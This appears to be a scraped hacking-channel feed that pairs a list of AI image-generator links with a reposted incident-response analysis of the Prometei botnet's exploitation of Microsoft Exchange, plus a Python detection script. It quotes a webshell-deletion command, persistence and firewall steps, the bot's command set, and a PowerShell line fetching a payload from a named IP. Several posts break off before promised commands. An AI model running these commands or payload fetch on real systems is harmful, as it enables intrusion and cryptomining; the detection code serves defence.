UNDERCODE TESTING
🦑 World first platform which Collect & Analyzes every New hacking method.

+ Free AI Practice.

(New Bug Bounty Methods, Tools Updates, AI & Courses).

Services: Undercode.help/services

youtube.com/undercode

@Undercode_Testing
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Top AI Image Generators:

### General AI Art Tools
1. DALL·E
[https://openai.com/dall-e](https://openai.com/dall-e)

2. MidJourney
[https://www.midjourney.com](https://www.midjourney.com)

3. Stable Diffusion (DreamStudio)
[https://dreamstudio.ai](https://dreamstudio.ai)

4. DeepAI Image Generator
[https://deepai.org/machine-learning-model/text2img](https://deepai.org/machine-learning-model/text2img)

5. Runway ML
[https://runwayml.com](https://runwayml.com)

### Free and Easy-to-Use Generators
6. Craiyon (formerly DALL·E Mini)
[https://craiyon.com](https://craiyon.com)

7. Artbreeder
[https://www.artbreeder.com](https://www.artbreeder.com)

8. Fotor AI Art Generator
[https://www.fotor.com/features/ai-image-generator](https://www.fotor.com/features/ai-image-generator)

9. Picsart AI Generator
[https://picsart.com/ai-image-generator](https://picsart.com/ai-image-generator)

10. NightCafe Studio
[https://creator.nightcafe.studio](https://creator.nightcafe.studio)

### Specialized AI Tools
11. Avatarify AI (For Portraits)
[https://www.avatarify.ai](https://www.avatarify.ai)

12. Deep Dream Generator (Surreal Images)
[https://deepdreamgenerator.com](https://deepdreamgenerator.com)

13. Deep Nostalgia (Photo Animation)
[https://www.myheritage.com/deep-nostalgia](https://www.myheritage.com/deep-nostalgia)

14. ArtSmart.ai
[https://artsmart.ai](https://artsmart.ai)

15. RunDiffusion (Customizable)
[https://www.rundiffusion.com](https://www.rundiffusion.com)
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Exploitation of the Microsoft Exchange Vulnerability:

During the IR investigation, the Nocturnus Team was able to identify the initial compromise vector, in which the attackers exploited the recently discovered vulnerabilities in Microsoft Exchange Server, which allowed them to perform remote code execution by exploiting the following CVEs: CVE-2021-27065 and CVE-2021-26858.

The attackers used this vulnerability to install and execute the China Chopper webshell via the following commands:
Forwarded from Exploiting Crew (Pr1vAt3)
Once the attackers gained access to the network, they deleted the .aspx webshell file to cover their tracks:

cmd.exe /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<file_name>.aspx"
Forwarded from Exploiting Crew (Pr1vAt3)
Using the webshell, the attackers launched PowerShell, which was then used to download a payload from the following URL:

http://178.21.164[.]68/dwn.php?b64=1&d=nethost64C.exe&B=_AMD64,<machine_name>

The payload is then saved as C:\windows\zsvc.exe and executed. This is the start of the Prometei botnet execution:
Forwarded from Exploiting Crew (Pr1vAt3)
The Prometei Botnet:

When the first module of the botnet, zsvc.exe, is executed, it starts to “prepare the ground” for the other modules:

It copies itself into C:\Windows with the name “sqhost.exe”
It uses Netsh commands to add a firewall rule that will allow sqhost.exe to create connections over HTTP
It checks if there is a registry key named “UPlugPlay”, and if present it deletes it
It sets a registry key for persistence as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay with the image path and command line c:\windows\sqhost.exe Dcomsvc
It creates several registry keys under SOFTWARE\Microsoft\Fax\ and SOFTWARE\Intel\support\ with the names MachineKeyId, EncryptedMachineKeyId and CommId, for later use by the different components for C2 communication.

Sqhost.exe:

Sqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands. Sqhost.exe is able to parse the prometei.cgi file from 4 different hardcoded command and control servers. The file contains the command to be executed on the machine. The commands can be used as “stand-alone” native OS commands (cmd commands, WMI, etc.) or can be used to interact with the other modules of the malware located under C:\Windows\dell.
Forwarded from Exploiting Crew (Pr1vAt3)
Sqhost supports the following commands:

Call - Execute a program or a file
Start_mining - launch SearchIndexer.exe (the miner) with the file C:\windows\dell\Desktop.dat as its parameters
Start_mining1 - request C:\windows\dell\Desktop.dat from the C2, and then launch SearchIndexer.exe (the miner) with the file C:\windows\dell\Desktop.dat as its parameters
Stop_mining - runs cmd.exe with command: “/c taskkill -f -im SearchIndexer.exe”
Wget - download a file
Xwget - download a file, save it, and use XOR to decrypt it
Quit - terminate the bot execution using TerminateProcess
Quit2 - terminate the bot execution without using TerminateProcess
Sysinfo - collect information about the machine (using native APIs and WMIC)
Exec - execute a command
Ver - return the bot version
Enc - get/set the RC4 encryption key
Extip - return the bot's external IP address
Chkport - check if a specific port is open
Search - search for files by name (potentially cryptocurrency wallets)
Set_timeout - set a period of time for connecting to C2 server
Touch - open a file
Touch_internal - edit a file with a single byte to change access times
Touch_stop - close a file
Update - update the bot version
Set_Autoexec2 - set an automatic execution
Set_Autoexec1 - set an automatic execution
Set_cc1 - set a C2 server
Set_cc0 - set a C2 server
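Detection logic for the host indicators quoted in the forwarded write-up (the webshell deletion under the Exchange OWA auth directory, the zsvc.exe download, the sqhost.exe Dcomsvc service command line, the netsh firewall rule, and the SearchIndexer.exe miner start/stop), as an added example that is not part of the original posts or of Cybereason's tooling. It runs a small set of rules over constructed process-creation records in an assumed "image|command_line" layout; the record format, the webshell and host names, the exact netsh arguments and the PowerShell download command are placeholders invented for the example, since the write-up does not show them.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation records in an assumed "image|command_line"
# layout (not a real log export). The first seven reproduce the indicators
# quoted in the write-up; the webshell name, host name, netsh argument layout
# and PowerShell download command are placeholders invented for this example.
# The last two are benign decoys that must not fire.
SAMPLE_LINES = [
    r'C:\Windows\System32\cmd.exe|cmd.exe /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\sample.aspx"',
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://178.21.164.68/dwn.php?b64=1&d=nethost64C.exe&B=_AMD64,WKSTN01','C:\windows\zsvc.exe')",
    r"C:\windows\zsvc.exe|C:\windows\zsvc.exe",
    r'C:\Windows\System32\netsh.exe|netsh advfirewall firewall add rule name="sqhost" dir=out action=allow program="C:\windows\sqhost.exe" protocol=tcp remoteport=80',
    r"C:\windows\sqhost.exe|c:\windows\sqhost.exe Dcomsvc",
    r"C:\windows\dell\SearchIndexer.exe|SearchIndexer.exe C:\windows\dell\Desktop.dat",
    r"C:\Windows\System32\cmd.exe|cmd.exe /c taskkill -f -im SearchIndexer.exe",
    r"C:\Windows\System32\SearchIndexer.exe|C:\Windows\System32\SearchIndexer.exe /Embedding",
    r"C:\Windows\System32\cmd.exe|cmd.exe /c del C:\Temp\old.log",
]

# Rules are matched against "<image> <command_line>", in kill-chain order.
RULES: List[Tuple[str, re.Pattern]] = [
    # cmd.exe deleting an .aspx under the Exchange OWA auth directory
    ("exchange_owa_aspx_deleted",
     re.compile(r"\bdel\b.*\\owa\\auth\\[^\\]+\.aspx", re.I)),
    # fetch from the payload URL named in the write-up
    ("prometei_payload_download",
     re.compile(r"178\.21\.164\.68/dwn\.php", re.I)),
    # first-stage dropper written to C:\windows\zsvc.exe
    ("prometei_dropper_path",
     re.compile(r"\\windows\\zsvc\.exe", re.I)),
    # main bot started the way the UPlugPlay service does
    ("prometei_sqhost_dcomsvc",
     re.compile(r"\\windows\\sqhost\.exe\s+Dcomsvc\b", re.I)),
    # netsh adding a firewall rule for sqhost.exe (argument layout is assumed)
    ("prometei_netsh_firewall_rule",
     re.compile(r"\bnetsh\b.*firewall.*\badd\b.*sqhost\.exe", re.I)),
    # miner posing as SearchIndexer.exe, fed C:\windows\dell\Desktop.dat
    ("prometei_miner_start",
     re.compile(r"SearchIndexer\.exe.*\\windows\\dell\\Desktop\.dat", re.I)),
    # the bot's Stop_mining command
    ("prometei_miner_stop",
     re.compile(r"\btaskkill\s+-f\s+-im\s+SearchIndexer\.exe", re.I)),
]


def parse_record(line: str) -> Tuple[str, str]:
    """Split one record on the first '|' only (command lines may contain more)."""
    image, _, cmdline = line.partition("|")
    return image.strip(), cmdline.strip()


def match_record(image: str, cmdline: str) -> List[str]:
    """Return the names of every rule that fires on this record."""
    haystack = f"{image} {cmdline}"
    return [name for name, pattern in RULES if pattern.search(haystack)]


def hunt(lines) -> Dict[str, List[str]]:
    """Map each rule that fired to the command lines that triggered it."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        image, cmdline = parse_record(line)
        for name in match_record(image, cmdline):
            hits.setdefault(name, []).append(cmdline)
    return hits


def kill_chain_stages(hits: Dict[str, List[str]]) -> List[str]:
    """Order the rules that fired by the stage they occupy in the write-up."""
    return [name for name, _ in RULES if name in hits]


if __name__ == "__main__":
    result = hunt(SAMPLE_LINES)
    for name in kill_chain_stages(result):
        print(f"[{name}]")
        for cmd in result[name]:
            print("   ", cmd)
```

The rules key on the paths and arguments the write-up gives rather than on file names alone: a genuine SearchIndexer.exe in System32 with /Embedding does not fire, only one launched with C:\windows\dell\Desktop.dat as its parameter does, and a cmd.exe deleting a file outside the OWA auth directory is ignored.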
Forwarded from Exploiting Crew (Pr1vAt3)
The execution of the malware encountered in the investigation shows activities performed by the attackers which included three processes: cmd.exe, sqhost.exe and wmic.exe:
Forwarded from Exploiting Crew (Pr1vAt3)
cmd.exe was used to execute the following commands (some of the commands are broken into individual commands for readability):